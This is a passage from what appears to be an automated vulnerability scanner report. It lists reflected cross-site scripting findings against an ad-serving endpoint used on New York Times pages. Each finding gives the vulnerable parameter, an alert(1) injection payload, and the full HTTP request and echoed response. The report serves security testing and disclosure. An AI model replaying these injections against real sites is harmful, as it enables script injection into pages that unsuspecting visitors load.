Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90720f7'-alert(1)-'6112183b0f2&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.14. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40c72"-alert(1)-"dbe1a9ec6e was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6747

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5
...[SNIP]...

3.15. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d10f2'-alert(1)-'f317ac05d12 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2d10f2'-alert(1)-'f317ac05d12&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2d10f2'-alert(1)-'f317ac05d12&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5
...[SNIP]...

3.16. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8125"-alert(1)-"445d6a35394 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=a8125"-alert(1)-"445d6a35394 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
w.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=a8125"-alert(1)-"445d6a35394http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

3.17. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fccb'-alert(1)-'facab827203 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=9fccb'-alert(1)-'facab827203 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
w.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=9fccb'-alert(1)-'facab827203http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.18. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c0fb'-alert(1)-'c291a30757 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&1c0fb'-alert(1)-'c291a30757=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:53:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6759

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&1c0fb'-alert(1)-'c291a30757=1http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.19. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be867"-alert(1)-"9ef92a9fab1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&be867"-alert(1)-"9ef92a9fab1=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:53:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6763

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&be867"-alert(1)-"9ef92a9fab1=1http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

3.20. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93369"-alert(1)-"a86203937ad was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html93369"-alert(1)-"a86203937ad&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
88564%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html93369"-alert(1)-"a86203937ad&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?bran
...[SNIP]...

3.21. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 973ee'-alert(1)-'aef67755056 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html973ee'-alert(1)-'aef67755056&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
88564%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html973ee'-alert(1)-'aef67755056&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?bran
...[SNIP]...

3.22. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f43c6"-alert(1)-"f1d869cb71d was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
54-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm
...[SNIP]...

3.23. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33049'-alert(1)-'ef4c6349c56 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
54-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm
...[SNIP]...

3.24. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfd08'-alert(1)-'a8a71a52983 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438fdfd08'-alert(1)-'a8a71a52983&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
age=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438fdfd08'-alert(1)-'a8a71a52983&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.25. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 304c3"-alert(1)-"820c38f512d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

